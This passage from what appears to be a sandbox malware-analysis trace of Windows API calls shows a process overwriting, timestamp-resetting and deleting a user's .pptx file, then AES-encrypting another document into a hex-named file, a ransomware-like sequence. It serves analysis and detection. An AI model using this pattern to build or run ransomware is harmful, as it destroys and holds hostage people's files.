(in: hFile=0x36c, lpBuffer=0x2147e00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2147e00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.896] WriteFile (in: hFile=0x36c, lpBuffer=0x2147e00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2147e00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.897] WriteFile (in: hFile=0x36c, lpBuffer=0x2147e00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2147e00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.898] WriteFile (in: hFile=0x36c, lpBuffer=0x2147e00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2147e00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.898] WriteFile (in: hFile=0x36c, lpBuffer=0x2147e00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2147e00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.899] WriteFile (in: hFile=0x36c, lpBuffer=0x2147e00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2147e00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.899] WriteFile (in: hFile=0x36c, lpBuffer=0x2147e00*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x2147e00*, lpNumberOfBytesWritten=0x1bf5daa8*=0x400, lpOverlapped=0x0) returned 1 [0075.899] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.900] WriteFile (in: hFile=0x36c, lpBuffer=0x2147e00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2147e00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.901] WriteFile (in: hFile=0x36c, lpBuffer=0x2147e00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2147e00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.902] WriteFile (in: hFile=0x36c, lpBuffer=0x2147e00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2147e00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.902] WriteFile (in: hFile=0x36c, lpBuffer=0x2147e00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2147e00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.903] WriteFile (in: hFile=0x36c, lpBuffer=0x2147e00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2147e00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.904] WriteFile (in: hFile=0x36c, lpBuffer=0x2147e00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2147e00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.904] WriteFile (in: hFile=0x36c, lpBuffer=0x2147e00*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x2147e00*, lpNumberOfBytesWritten=0x1bf5daa8*=0x400, lpOverlapped=0x0) returned 1 [0075.904] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.905] WriteFile (in: hFile=0x36c, lpBuffer=0x2147e00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2147e00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.906] WriteFile (in: hFile=0x36c, lpBuffer=0x2147e00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2147e00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.906] WriteFile (in: hFile=0x36c, lpBuffer=0x2147e00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2147e00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.907] WriteFile (in: hFile=0x36c, lpBuffer=0x2147e00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2147e00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.908] WriteFile (in: hFile=0x36c, lpBuffer=0x2147e00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2147e00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.909] WriteFile (in: hFile=0x36c, lpBuffer=0x2147e00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2147e00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.909] WriteFile (in: hFile=0x36c, lpBuffer=0x2147e00*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x2147e00*, lpNumberOfBytesWritten=0x1bf5daa8*=0x400, lpOverlapped=0x0) returned 1 [0075.909] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.910] WriteFile (in: hFile=0x36c, lpBuffer=0x2147e00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2147e00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.910] WriteFile (in: hFile=0x36c, lpBuffer=0x2147e00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2147e00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.911] WriteFile (in: hFile=0x36c, lpBuffer=0x2147e00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2147e00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.912] WriteFile (in: hFile=0x36c, lpBuffer=0x2147e00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2147e00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.913] WriteFile (in: hFile=0x36c, lpBuffer=0x2147e00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2147e00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.913] WriteFile (in: hFile=0x36c, lpBuffer=0x2147e00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2147e00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.914] WriteFile (in: hFile=0x36c, lpBuffer=0x2147e00*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x2147e00*, lpNumberOfBytesWritten=0x1bf5daa8*=0x400, lpOverlapped=0x0) returned 1 [0075.914] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0075.914] SetEndOfFile (hFile=0x36c) returned 1 [0075.915] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0075.915] CloseHandle (hObject=0x36c) returned 1 [0075.915] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VcLUa_IRpSFwCdtTeIUe.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VcLUa_IRpSFwCdtTeIUe.pptx", lpFilePart=0x0) returned 0x41 [0075.915] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0075.915] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VcLUa_IRpSFwCdtTeIUe.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vclua_irpsfwcdtteiue.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.915] GetFileType (hFile=0x36c) returned 0x1 [0075.915] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0075.915] GetFileType (hFile=0x36c) returned 0x1 [0075.915] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5db78, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0075.915] CloseHandle (hObject=0x36c) returned 1 [0075.915] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VcLUa_IRpSFwCdtTeIUe.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VcLUa_IRpSFwCdtTeIUe.pptx", lpFilePart=0x0) returned 0x41 [0075.915] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0075.915] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VcLUa_IRpSFwCdtTeIUe.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vclua_irpsfwcdtteiue.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.916] GetFileType (hFile=0x36c) returned 0x1 [0075.916] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0075.916] GetFileType (hFile=0x36c) returned 0x1 [0075.916] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5db78, lpLastWriteTime=0x0) returned 1 [0075.916] CloseHandle (hObject=0x36c) returned 1 [0075.916] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VcLUa_IRpSFwCdtTeIUe.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VcLUa_IRpSFwCdtTeIUe.pptx", lpFilePart=0x0) returned 0x41 [0075.916] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0075.916] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VcLUa_IRpSFwCdtTeIUe.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vclua_irpsfwcdtteiue.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.916] GetFileType (hFile=0x36c) returned 0x1 [0075.916] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0075.916] GetFileType (hFile=0x36c) returned 0x1 [0075.916] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5db78) returned 1 [0075.916] CloseHandle (hObject=0x36c) returned 1 [0075.916] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VcLUa_IRpSFwCdtTeIUe.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VcLUa_IRpSFwCdtTeIUe.pptx", lpFilePart=0x0) returned 0x41 [0075.916] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VcLUa_IRpSFwCdtTeIUe.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vclua_irpsfwcdtteiue.pptx")) returned 1 [0075.917] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VcLUa_IRpSFwCdtTeIUe.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VcLUa_IRpSFwCdtTeIUe.pptx", lpFilePart=0x0) returned 0x41 [0075.918] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B9E3D1F8F29B04480F47CC8AE7A9A30C", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B9E3D1F8F29B04480F47CC8AE7A9A30C", lpFilePart=0x0) returned 0x48 [0075.918] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0075.918] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B9E3D1F8F29B04480F47CC8AE7A9A30C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b9e3d1f8f29b04480f47cc8ae7a9a30c"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.918] GetFileType (hFile=0x36c) returned 0x1 [0075.918] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0075.918] GetFileType (hFile=0x36c) returned 0x1 [0075.918] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5dc18, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0075.918] CloseHandle (hObject=0x36c) returned 1 [0075.918] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B9E3D1F8F29B04480F47CC8AE7A9A30C", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B9E3D1F8F29B04480F47CC8AE7A9A30C", lpFilePart=0x0) returned 0x48 [0075.918] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0075.918] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B9E3D1F8F29B04480F47CC8AE7A9A30C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b9e3d1f8f29b04480f47cc8ae7a9a30c"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.919] GetFileType (hFile=0x36c) returned 0x1 [0075.919] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0075.919] GetFileType (hFile=0x36c) returned 0x1 [0075.919] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5dc18, lpLastWriteTime=0x0) returned 1 [0075.919] CloseHandle (hObject=0x36c) returned 1 [0075.919] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B9E3D1F8F29B04480F47CC8AE7A9A30C", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B9E3D1F8F29B04480F47CC8AE7A9A30C", lpFilePart=0x0) returned 0x48 [0075.919] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0075.919] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B9E3D1F8F29B04480F47CC8AE7A9A30C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b9e3d1f8f29b04480f47cc8ae7a9a30c"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.919] GetFileType (hFile=0x36c) returned 0x1 [0075.919] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0075.919] GetFileType (hFile=0x36c) returned 0x1 [0075.919] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5dc18) returned 1 [0075.919] CloseHandle (hObject=0x36c) returned 1 [0075.919] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vgYnkjmm0.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vgYnkjmm0.pptx", lpFilePart=0x0) returned 0x36 [0075.920] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vgYnkjmm0.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vgYnkjmm0.pptx", lpFilePart=0x0) returned 0x36 [0075.921] CryptAcquireContextW (in: phProv=0x1bf5da68, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1bf5da68*=0x1a5b7d10) returned 1 [0075.921] CryptImportKey (in: hProv=0x1a5b7d10, pbData=0x214b428, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5da20 | out: phKey=0x1bf5da20*=0x1a6269f0) returned 1 [0075.921] CryptContextAddRef (hProv=0x1a5b7d10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.921] CryptExportKey (in: hKey=0x1a6269f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5db30 | out: pbData=0x0*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0075.921] CryptExportKey (in: hKey=0x1a6269f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x214b518, pdwDataLen=0x1bf5db30 | out: pbData=0x214b518*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0075.922] CryptImportKey (in: hProv=0x1a5b7d10, pbData=0x214b638, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d9f0 | out: phKey=0x1bf5d9f0*=0x1a626e50) returned 1 [0075.922] CryptContextAddRef (hProv=0x1a5b7d10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.922] CryptContextAddRef (hProv=0x1a5b7d10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.922] CryptDuplicateKey (in: hKey=0x1a626e50, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d9e0 | out: phKey=0x1bf5d9e0*=0x1a626c20) returned 1 [0075.922] CryptContextAddRef (hProv=0x1a5b7d10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.922] CryptSetKeyParam (hKey=0x1a626c20, dwParam=0x4, pbData=0x214b780*=0x1, dwFlags=0x0) returned 1 [0075.922] CryptSetKeyParam (hKey=0x1a626c20, dwParam=0x1, pbData=0x214b730, dwFlags=0x0) returned 1 [0075.922] CryptDestroyKey (hKey=0x1a626e50) returned 1 [0075.922] CryptReleaseContext (hProv=0x1a5b7d10, dwFlags=0x0) returned 1 [0075.922] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vgYnkjmm0.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vgYnkjmm0.pptx", lpFilePart=0x0) returned 0x36 [0075.922] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0075.922] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vgYnkjmm0.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vgynkjmm0.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.922] GetFileType (hFile=0x36c) returned 0x1 [0075.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0075.922] GetFileType (hFile=0x36c) returned 0x1 [0075.922] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\80ED363B1AF7221527BE954D7E003980", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\80ED363B1AF7221527BE954D7E003980", lpFilePart=0x0) returned 0x48 [0075.922] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0075.922] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\80ED363B1AF7221527BE954D7E003980" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\80ed363b1af7221527be954d7e003980"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x358 [0075.923] GetFileType (hFile=0x358) returned 0x1 [0075.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0075.923] GetFileType (hFile=0x358) returned 0x1 [0075.923] ReadFile (in: hFile=0x36c, lpBuffer=0x214bb30, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x214bb30*, lpNumberOfBytesRead=0x1bf5da28*=0x1ab3, lpOverlapped=0x0) returned 1 [0075.924] CryptEncrypt (in: hKey=0x1a626c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x215fb48*, pdwDataLen=0x1bf5da80*=0x1ab0, dwBufLen=0x1ab0 | out: pbData=0x215fb48*, pdwDataLen=0x1bf5da80*=0x1ab0) returned 1 [0075.924] WriteFile (in: hFile=0x358, lpBuffer=0x215fb48*, nNumberOfBytesToWrite=0x1ab0, lpNumberOfBytesWritten=0x1bf5da18, lpOverlapped=0x0 | out: lpBuffer=0x215fb48*, lpNumberOfBytesWritten=0x1bf5da18*=0x1ab0, lpOverlapped=0x0) returned 1 [0075.952] ReadFile (in: hFile=0x36c, lpBuffer=0x214bb30, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x214bb30*, lpNumberOfBytesRead=0x1bf5da28*=0x0, lpOverlapped=0x0) returned 1 [0075.952] CryptEncrypt (in: hKey=0x1a626c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2161638*, pdwDataLen=0x1bf5d9c0*=0x10, dwBufLen=0x10 | out: pbData=0x2161638*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0075.952] CryptEncrypt (in: hKey=0x1a626c20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2161688*, pdwDataLen=0x1bf5d9c0*=0x0, dwBufLen=0x10 | out: pbData=0x2161688*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0075.953] WriteFile (in: hFile=0x358, lpBuffer=0x21616d8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d948, lpOverlapped=0x0 | out: lpBuffer=0x21616d8*, lpNumberOfBytesWritten=0x1bf5d948*=0x10, lpOverlapped=0x0) returned 1 [0075.953] CloseHandle (hObject=0x358) returned 1 [0075.954] CloseHandle (hObject=0x36c) returned 1 [0075.954] CryptDestroyKey (hKey=0x1a6269f0) returned 1 [0075.954] CryptReleaseContext (hProv=0x1a5b7d10, dwFlags=0x0) returned 1 [0075.954] CryptReleaseContext (hProv=0x1a5b7d10, dwFlags=0x0) returned 1 [0075.954] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\80ED363B1AF7221527BE954D7E003980", nBufferLength=0x105, lpBuffer=0x1bf5d480, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\80ED363B1AF7221527BE954D7E003980", lpFilePart=0x0) returned 0x48 [0075.954] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d960) returned 1 [0075.954] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\80ED363B1AF7221527BE954D7E003980" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\80ed363b1af7221527be954d7e003980"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.954] GetFileType (hFile=0x36c) returned 0x1 [0075.954] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8d0) returned 1 [0075.954] GetFileType (hFile=0x36c) returned 0x1 [0075.954] ReadFile (in: hFile=0x36c, lpBuffer=0x2162dd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2162dd0*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.955] ReadFile (in: hFile=0x36c, lpBuffer=0x2162dd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2162dd0*, lpNumberOfBytesRead=0x1bf5da48*=0xac0, lpOverlapped=0x0) returned 1 [0075.956] ReadFile (in: hFile=0x36c, lpBuffer=0x2162dd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2162dd0*, lpNumberOfBytesRead=0x1bf5da48*=0x0, lpOverlapped=0x0) returned 1 [0075.956] CloseHandle (hObject=0x36c) returned 1 [0075.958] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\80ED363B1AF7221527BE954D7E003980.info", nBufferLength=0x105, lpBuffer=0x1bf5d200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\80ED363B1AF7221527BE954D7E003980.info", lpFilePart=0x0) returned 0x4d [0075.958] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d6e0) returned 1 [0075.958] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\80ED363B1AF7221527BE954D7E003980.info" (normalized: "c:\\users\\5p5nrgjn0js 